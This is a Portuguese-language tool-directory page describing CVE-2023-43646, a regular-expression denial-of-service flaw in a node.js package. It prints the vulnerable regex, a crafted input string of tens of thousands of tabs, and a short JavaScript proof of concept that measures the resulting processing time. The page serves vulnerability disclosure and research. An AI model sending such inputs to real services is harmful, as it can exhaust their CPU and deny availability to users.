Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43646 — redos | Kitploit
Ferramentas/GitHubGitHub/200101whoami/cve-2023-43646
Scanners de VulnerabilidadesAnálise de VulnerabilidadesAnálise de CódigoPapers e PesquisaAprendizado e Educação
GitHub200101whoami/cve-2023-43646

CVE-2023-43646

redos

Ver Repositório
3há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43646

Resumo da vulnerabilidade

  • CVE-2023-43646

  • CVSS : 8.6

  • Sep 26, 2023

  • ReDoS in node.js package

  • Parte do projeto rebob

Descrição da vulnerabilidade

Advisories do GitHub

root@kitploit:~
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/

Esta vulnerabilidade pode ser explorada quando há um desequilíbrio nos parênteses, o que resulta em retrocesso excessivo e, consequentemente, aumenta significativamente a carga da CPU e o tempo de processamento. Esta vulnerabilidade pode ser acionada usando a seguinte entrada:

root@kitploit:~
'\t'.repeat(54773) + '\t/function/i'

Aqui está um código PoC simples para demonstrar o problema:

root@kitploit:~
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

pacote alvo

Baixar ferramenta